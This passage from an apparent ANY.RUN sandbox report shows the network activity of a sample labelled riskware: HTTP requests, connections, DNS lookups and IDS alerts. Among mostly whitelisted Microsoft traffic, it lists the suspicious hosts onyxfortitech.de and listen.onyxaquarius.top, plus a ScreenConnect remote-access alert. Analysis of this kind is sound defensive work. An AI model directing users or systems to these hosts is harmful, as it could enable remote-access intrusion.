http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7920
SIHClient.exe
GET
200
23.32.97.216:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2104
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
23.48.23.188:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5176
dfsvc.exe
104.21.85.50:443
onyxfortitech.de
CLOUDFLARENET
unknown
6544
svchost.exe
40.126.32.134:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
23.40.158.218:80
ocsp.digicert.com
AKAMAI-AS
MX
whitelisted
3216
svchost.exe
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5176
dfsvc.exe
23.40.158.218:80
ocsp.digicert.com
AKAMAI-AS
MX
whitelisted
2112
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
google.com
  • 142.250.185.110
whitelisted
crl.microsoft.com
  • 23.48.23.188
  • 23.48.23.162
  • 23.48.23.190
  • 23.48.23.181
  • 23.48.23.191
  • 23.48.23.166
  • 23.48.23.176
  • 23.48.23.173
  • 23.48.23.164
whitelisted
onyxfortitech.de
  • 104.21.85.50
  • 172.67.202.119
unknown
login.live.com
  • 40.126.32.134
  • 20.190.160.20
  • 20.190.160.131
  • 20.190.160.130
  • 20.190.160.2
  • 20.190.160.132
  • 20.190.160.14
  • 20.190.160.3
  • 40.126.32.76
  • 40.126.32.74
  • 20.190.160.66
  • 20.190.160.65
whitelisted
ocsp.digicert.com
  • 23.40.158.218
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted
arc.msn.com
  • 20.223.36.55
whitelisted
listen.onyxaquarius.top
  • 194.102.105.26
unknown
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted

Threats

PID
Process
Class
Message
A Network Trojan was detected
MALWARE [ANY.RUN] Suspected Domain Associated with Malware Distribution (onyxaquarius .top)
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
Potential Corporate Privacy Violation
REMOTE [ANY.RUN] ScreenConnect Server Response
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
SecuriteInfo.com.Riskware.00584baa1.19716.27363